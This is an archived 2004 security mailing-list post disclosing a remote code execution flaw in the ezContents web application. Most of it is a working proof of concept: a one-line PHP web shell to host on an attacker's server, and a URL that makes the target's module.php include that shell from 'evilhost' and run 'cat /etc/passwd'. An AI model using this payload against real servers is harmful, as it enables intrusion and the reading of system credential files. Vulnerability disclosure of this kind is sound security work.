|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Remote Code Execution in ezContents
From: Zero_X www.lobnan.de Team (zero-x
linuxmail.org)
Date: Sat Jan 10 2004 - 11:13:58 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]